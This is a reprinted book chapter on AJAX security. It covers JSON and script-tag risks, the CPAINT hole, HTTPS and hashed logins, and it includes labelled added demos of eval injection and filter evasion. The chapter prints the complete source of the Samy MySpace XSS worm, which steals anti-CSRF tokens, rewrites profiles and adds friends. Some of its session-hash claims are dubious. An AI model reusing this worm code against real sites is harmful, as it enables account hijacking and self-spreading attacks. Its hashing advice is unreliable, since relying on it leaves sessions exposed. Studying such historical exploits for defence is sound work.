JSON - An Attempt to Bring XSS Back

This content is reprinted from Real-World AJAX: Secrets of the Masters, published by SYS-CON Books.

JSON - An Attempt to Bring XSS Back
JSON lets one take advantage of the "On Demand Javascript/Script Tag hack" described earlier. This technique allows new HTML script tags to be dynamically generated and the "script" to be downloaded from any server.

When the downloaded script is made up of data formatted in JSON, the script tag is effectively being used to download new data across domains outside of the same-origin policy.

But if you're going to employ JSON techniques to create an application, great care must be taken to close potential security holes. And, in this case, you'd be depending on all JavaScript coming from third-party sources to cooperate with your application and your intentions. In other words, generally speaking, this technique opens up your application to whatever JavaScript is supplied by the servers you're making requests from. For this reason, this technique may be better suited to more controlled environments than the public Web.
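The difference between "data" and "script" that this section turns on, as an added example that is not part of the book: a JSONP-style response loaded through a script tag (and the old eval-based parse of an XMLHttpRequest response) runs whatever the remote server sends, while JSON.parse accepts only data. The responses and the `onFeed` callback are constructed for the illustration.

```javascript
// Added example, not code from the book: why JSON that arrives through a
// <script> tag (or through eval) is executable code, while JSON handed to
// JSON.parse is only data. The "responses" below are constructed samples.
const sink = {};               // records whether foreign code got to run

// 1. JSONP-style: the page adds <script src="http://third-party/feed?cb=onFeed">
//    and the server answers with a call to that callback. Evaluating the
//    response is exactly what the browser does with a script tag.
function onFeed(data) { sink.feed = data; }
const HONEST_JSONP   = 'onFeed({"user":"alice","items":[1,2,3]})';
const TAMPERED_JSONP = 'onFeed({"user":"alice","items":[1,2,3]});sink.hijacked=true';

function loadViaScriptTag(responseText) {
  // direct eval stands in for the script element; nothing stops the second statement
  eval(responseText);
  return sink.feed;
}

// 2. Same-origin XMLHttpRequest: the response is a string, and you choose how
//    to interpret it.
const HONEST_JSON   = '{"user":"alice","items":[1,2,3]}';
// JSON-looking body whose "value" is an expression: valid JavaScript, invalid JSON
const TAMPERED_JSON = '{"user":"alice","items":[1,2,3],"x":(sink.hijacked2=true)}';

// Pre-JSON.parse idiom still found in old AJAX code: executes embedded expressions.
function legacyParse(responseText) {
  return eval('(' + responseText + ')');
}

// Defender's version: a real JSON parser rejects anything that is not data,
// and the result is then checked against the shape the application expects.
function safeParse(responseText) {
  const obj = JSON.parse(responseText);        // throws SyntaxError on TAMPERED_JSON
  if (typeof obj !== 'object' || obj === null ||
      typeof obj.user !== 'string' || !Array.isArray(obj.items)) {
    throw new TypeError('unexpected feed shape');
  }
  return obj;
}

// Runs all three paths and reports which ones let foreign code execute.
function demo() {
  sink.hijacked = false;
  sink.hijacked2 = false;
  loadViaScriptTag(HONEST_JSONP);
  loadViaScriptTag(TAMPERED_JSONP);            // the appended statement executes
  legacyParse(HONEST_JSON);
  legacyParse(TAMPERED_JSON);                  // the embedded expression executes
  let safeRejected = false;
  try { safeParse(TAMPERED_JSON); } catch (e) { safeRejected = e instanceof SyntaxError; }
  return { scriptTagRan: sink.hijacked, legacyEvalRan: sink.hijacked2, safeRejected };
}
```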

Other parts of this book will discuss JSON in detail. What's important to note here is that JSON is a good example of how developers will continue to build paths to external data even when some security may be built in to prohibit it.

When this happens, your own security efforts and your understanding of the risks become more important in the design and maintenance of your Web application.

The CPAINT Hole
CPAINT, the cross-platform Asynchronous Internet Toolkit, is a common set of tools used by many sites to implement AJAX. In October 2005, a hole was found in servers running CPAINT that allowed the execution of malicious code on a server using CPAINT.

When the hole was noticed, the CPAINT community rapidly identified a solution and released a patch to close it. CPAINT was therefore more a hole in a tool than a risk inherent to AJAX, but the hole itself was an AJAX issue.

CPAINT examines requests to parse out malicious code. However, like Samy's MySpace worm code, malicious code could be introduced to the server by providing it in fragments the CPAINT parser would allow and concatenate into executable script.

CPAINT also included elements that allowed malicious code to fish for and execute server-side code.

In both of these instances, validating the request and properly screening for malicious code quickly sealed the security holes. More information is at www.techworld.com/security/news/index.cfm?NewsID=4245

Good Old Network Security
General network security remains important in AJAX applications, since we've seen that the server-side risks can increase with AJAX. A few simple network security practices can go a long way toward increasing the security of your server.

Securing the conversation between the browser and the server is key to securing AJAX servers. As mentioned above, unverified XMLHttpRequests can steal information or release malicious code. Maintaining strict control over requests is therefore an important consideration in AJAX application design.

HTTPS
HTTPS is standard secure HTTP. HTTPS sessions typically use a different port than unsecured HTTP (HTTPS uses port 443, HTTP uses port 80). Transactions over HTTPS are encrypted via SSL. An encrypted connection over HTTPS can aid in securing session and request validation by hiding the contents of specific requests, including session identifiers, from eavesdroppers.

Typically, because HTTP is a stateless protocol, state is maintained between the browser and a server by passing a session ID back and forth. This ID can be stored in a cookie on the browser (whose cookie data is then sent back to the originating server), embedded in request URLs, or embedded in some part of the Web page that communicates with the server.

This last case is particularly viable with AJAX. For example, in response to an AJAX request, a server can include a short-lived session ID. The server can then validate subsequent requests from the browser based on that ID.

A malicious user or application could try to capture that ID and then reuse it to impersonate the user/application that initiated the session. To the degree that the browser prevents cross-site scripting attacks, this ID is safe in the browser context.

But, "on the wire," using HTTP, the value of this ID would be exposed as plain text. And, if the session ID persisted for a long time, there would be a bigger window of opportunity to hijack the session.

Fortunately, by encrypting the connection between the browser and server, HTTPS never exposes the request or response contents as plain text. So session IDs aren't exposed "on the wire."

Encryption

  • The Hash: Many secure transactions on the Web take place using a cryptographic tool called a hash. A hash is a derived value that approximates randomness as much as possible but retains coherence and verifiability. A server will supply a given session with a unique hash that can accompany the URI, track the session, and validate requests. The hash itself isn't used to log into a session, merely to track one. Therefore, if a hash is intercepted, it can't be used by an outside entity.
  • Direct Login: Another interesting security-related feature that makes use of AJAX is a technique known as "direct login." Direct login directly submits login information using an XMLHttpRequest rather than using a single full-page post of an HTML form.
Direct login, in some sense, is actually less direct: several steps are involved that can provide added security. But, from the user's perspective, the login is "direct" because his login is occurring without reloading the page.

Because the direct login process uses JavaScript, it can take advantage of JavaScript's ability to calculate hashes and then transmit only hashed credentials, rather than plain text, to the server.

Direct login can work hand-in-hand with HTTPS. But sometimes HTTPS is unavailable or undesirable, due to the performance overhead associated with encrypting all of the browser-server conversation.

Figure 8.1 shows how direct login works. A user already has an account on the server. When the user approaches the site, the server creates a unique one-time session seed. The server provides the session seed to the browser, which asks the user for a user name and password/passphrase. If the password (stored locally) is valid, the browser then creates an attempted hash (it assumes the hash is on the server) based on the user's unique ID. The system then hashes that again (double hashing) with the session seed.

This creates a very secure hash to provide the server. The browser then feeds the server the double hash, the user name, and the session seed.

The server then takes the seed and user name and verifies them. It then computes the stored hash for that user, combines it with the seed, and creates its own server-side double hash. That double hash is then compared to the one sent by the browser.

If they match, the user can access the system. If they don't, the server can generate a second seed and rechallenge the browser.

In this system, the actual user password is never transmitted. Only the double hash and the user ID are transmitted. Computation on both sides is necessary to create the unique session double hash.

  • Host-Proof Hosting: Host-proof hosting is still more of a theory than an actual technique. First raised by Richard Schwartz, host-proof hosting encrypts most information traveling through a server to protect both the host and the client from data theft or other intrusions.

Exploit with Care
Users don't know what you are doing to them. Your AJAX code may work miracles, but may leave their comfort zone, which the more savvy will immediately bring to your attention (and through their blogs, everyone else's).

AJAX applications by design shuffle data around. If you're gathering information about their visit or supplying data to them from a variety of sources - let the users know. You may feel your application is completely innocent, but others may feel differently.

Also, without that information, others may grow not to trust your application if they feel their information is in some way being used without their consent.

Last, as technologies come and go, good and bad exploits are going to come and go with them. Disclosure will keep you safe.

Conclusion: I Must Exploit: I Must Not Be Exploited
Exploits are what drive AJAX development. AJAX is all about pushing the browser to its limits. How close can it get to desktop app complexity? How much data can we combine and analyze on one elegant Web page? How many independent data requests can feed one session?

But even as we exploit, we don't want to be exploited. XSS, JSON, and other future flavors of AJAX all bring previously unseen power to browser-based apps. But they bring the danger of malicious scripting with them. Since AJAX is, and for its lifetime will be, a work-in-progress, google AJAX Security often.

Full Code Example: The Samy MySpace Virus
Examining the Samy virus shows that while it's technically easy to use some of these exploits, it's still a bit of work.

  // get quotes string
  var B=String.fromCharCode(34);
  var A=String.fromCharCode(39);

  function g()
  {
    var C;
    try
    {
      var D=document.body.createTextRange();
      C=D.htmlText
    }
    catch(e)
    {
    }
      if(C)
    { return C
    }
    else
    {
    return eval('document.body.inne'+'rHTML')
    }
  }

  function getData(AU)
  {
    M=getFromURL(AU,'friendID');
    L=getFromURL(AU,'Mytoken')
  }

  function getQueryParams()
  {
    var E=document.location.search;
    var F=E.substring(1,E.length).split('&');
    var AS=new Array();
    for(var O=0;O<F.length;O++)
    {
      var I=F[O].split('=');
      AS[I[0]]=I[1]
    }
    return AS
  }

  var J;
  var AS=getQueryParams();
  var L=AS['Mytoken'];
  var M=AS['friendID'];

  if(location.hostname=='profile.myspace.com')
  {
    document.location='http://www.myspace.com'+
location.pathname+location.search
  }
  else
  {
    if(!M)
    {
      getData(g())
    }
    main()
  }

  function getClientFID()
  {
    return findIn(g(),'up_launchIC( '+A,A)
  }

  function nothing()
  {
  }

  function paramsToString(AV)
  {
    var N=new String();
    var O=0;
    for(var P in AV)
    {
      if(O>0)
      {
      N+='&'
      }
      var Q=escape(AV[P]);
          while(Q.indexOf('+')!=-1)
      {
        Q=Q.replace('+','%2B')
      }
          while(Q.indexOf('&')!=-1)
      {
        Q=Q.replace('&','%26')
      }

      N+=P+'='+Q;
      O++
    }
    return N
  }

  function httpSend(BH,BI,BJ,BK)
  {
    if(!J)
    {
      return false
    }
    eval('J.onr'+'eadystatechange=BI');
    J.open(BJ,BH,true);
    if(BJ=='POST')
    {
      J.setRequestHeader('Content-Type',
'application/x-www-form-urlencoded');
      J.setRequestHeader('Content-Length',BK.length)
    }
     J.send(BK);
     return true
  }

  function findIn(BF,BB,BC)
  {
    var R=BF.indexOf(BB)+BB.length;
    var S=BF.substring(R,R+1024);
    return S.substring(0,S.indexOf(BC))
  }

  function getHiddenParameter(BF,BG)
  {
    return findIn(BF,'name='+B+BG+B+' value='+B,B)
  }

  function getFromURL(BF,BG)
  {
    var T;
    if(BG=='Mytoken')
    {
      T=B
    }
     else
    {
      T='&'
    }
    var U=BG+'=';
    var V=BF.indexOf(U)+U.length;
    var W=BF.substring(V,V+1024);
    var X=W.indexOf(T);
    var Y=W.substring(0,X);
    return Y
  }

  function getXMLObj()
  {
    var Z=false;
    if(window.XMLHttpRequest)
    {
      try
      {
        Z=new XMLHttpRequest()
      }
      catch(e)
      {
        Z=false
      }
    }
    else if(window.ActiveXObject)
    {
      try
      {
        Z=new ActiveXObject('Msxml2.XMLHTTP')
      }
      catch(e)
      {
        try
        {
          Z=new ActiveXObject('Microsoft.XMLHTTP')
        }
        catch(e)
        {
          Z=false
        }
      }
    }
    return Z
  }

  var AA=g();
  var AB=AA.indexOf('m'+'ycode');
  var AC=AA.substring(AB,AB+4096);
  var AD=AC.indexOf('D'+'IV');
  var AE=AC.substring(0,AD);
  var AF;

  if(AE)
  {
    AE=AE.replace('jav'+'a',A+'jav'+'a');
    AE=AE.replace('exp'+'r)','exp'+'r)'+A);
    AF=' but most of all, samy is my hero. '
  }

  var AG;

  function getHome()
  {
    if(J.readyState!=4)
    {
    return
  }

    var AU=J.responseText;
    AG=findIn(AU,'P'+'rofileHeroes','');
    AG=AG.substring(61,AG.length);
    if(AG.indexOf('samy')==-1)
    {
      if(AF)
      {
        AG+=AF;
      var AR=getFromURL(AU,'Mytoken');
      var AS=new Array();
      AS['interestLabel']='heroes';
      AS['submit']='Preview';
      AS['interest']=AG;
      J=getXMLObj();
        httpSend('/index.cfm?fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))
      }
    }
  }

  function postHero()
  {
    if(J.readyState!=4)
    {
      return
  }

      var AU=J.responseText;
      var AR=getFromURL(AU,'Mytoken');
      var AS=new Array();
      AS['interestLabel']='heroes';
      AS['submit']='Submit';
      AS['interest']=AG;
      AS['hash']=getHiddenParameter(AU,'hash');
      httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))
  }

  function main()
  {
      var AN=getClientFID();
      var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;
      J=getXMLObj();
      httpSend(BH,getHome,'GET');
      xmlhttp2=getXMLObj();
      httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')
  }

  function processxForm()
  {
    if(xmlhttp2.readyState!=4)
    {
      return
  }

    var AU=xmlhttp2.responseText;
    var AQ=getHiddenParameter(AU,'hashcode');
    var AR=getFromURL(AU,'Mytoken');
    var AS=new Array();
    AS['hashcode']=AQ;
    AS['friendID']='11851658';
    AS['submit']='Add to Friends';
    httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))
  }

  function httpSend2(BH,BI,BJ,BK)
  {
    if(!xmlhttp2)
    {
      return false
    }

    eval('xmlhttp2.onr'+'eadystatechange=BI');
    xmlhttp2.open(BJ,BH,true);

    if(BJ=='POST')
    {
      xmlhttp2.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
      xmlhttp2.setRequestHeader('Content-Length',BK.length)
    }

    xmlhttp2.send(BK);
    return true
  }
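The filtering lesson from the CPAINT discussion and from the worm source above (the word "innerHTML" is assembled at run time as 'inne'+'rHTML', and "java" as 'jav'+'a'), as an added example that is not from the book: a keyword blacklist of the kind the chapter describes is evaded by fragments, rejoining fragments before filtering closes only that one trick, and encoding user text for its HTML context needs no word list at all. The profile submission and the banned-word list are constructed for the illustration.

```javascript
// Added example, not from the book: why the keyword filtering the worm above
// evaded (eval('inne'+'rHTML'), 'jav'+'a') is the wrong defence, and what
// works instead. The profile text is constructed; the banned-word list is
// my assumption about the kind of filter the chapter describes.
const BANNED = ['javascript', 'innerhtml', 'onload', '<script'];

// The naive filter: reject submissions that contain a known-bad word.
function blacklistAccepts(text) {
  const lower = text.toLowerCase();
  return !BANNED.some((word) => lower.includes(word));
}

// Rejoin 'abc'+'def' (or "abc"+"def") pairs until nothing changes, which is
// what the JavaScript engine does at run time. This closes one trick only.
function normalizeFragments(text) {
  const pair = /(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3/g;
  let previous;
  do {
    previous = text;
    text = text.replace(pair, (_m, _q1, a, _q2, b) => `'${a}${b}'`);
  } while (text !== previous);
  return text;
}

// The durable defence: encode user text for the HTML context it lands in, so
// no word list is needed; the browser sees text, never markup or script.
function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Constructed profile submission using the split-string trick from the worm.
const SUBMITTED = '<div id="heroes">but most of all, eval(\'inne\'+\'rHTML\') is my hero.</div>';

function demo() {
  return {
    naiveAccepts: blacklistAccepts(SUBMITTED),                          // true: the word never appears whole
    normalizedAccepts: blacklistAccepts(normalizeFragments(SUBMITTED)), // false: caught after rejoining
    encodedHasMarkup: /[<>]/.test(escapeHtml(SUBMITTED)),               // false: nothing left to execute
  };
}
```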


More Stories By James Benson

Jim Benson, AICP, is the COO of Gray Hill Solutions in Seattle. Gray Hill creates tools for government and industry to harness and utilize real-time data. Jim has always driven applications for his clients to store and provide information in easily extensible ways. Web 2.0 has therefore been a natural environment for him. He is also involved with the Cooperation Commons and the Institute for the Future's Future Commons to study human cooperation and envision the future of cooperation. Jim's tags: Gray Hill Solutions (www.grayhillsolutions.com), Jim's Blog (http://ourfounder.typepad.com), Cooperation Commons (www.cooperationcommons.org), Institute for the Future (www.iftf.org).

More Stories By Jay Fienberg

Jay Fienberg is co-founder of Juxtaprose where he designs information architecture and user experience for websites and information systems.

He specializes in design for content and information-rich websites and web-based social and collaboration systems. His current preferred CMS is ExpressionEngine, though he also works with Wordpress and Joomla, and still gets called upon to make SharePoint do interesting CMS-like things for enterprise intranets.

Since the early 1990s, Jay also has designed and developed hypertext, database, and content management systems and worked in a wide range of programming languages including XML, SQL, SGML, Python, PHP, Javascript, Java, HTML, CSS and APL.

For anything more official, please visit jayfienberg.com.
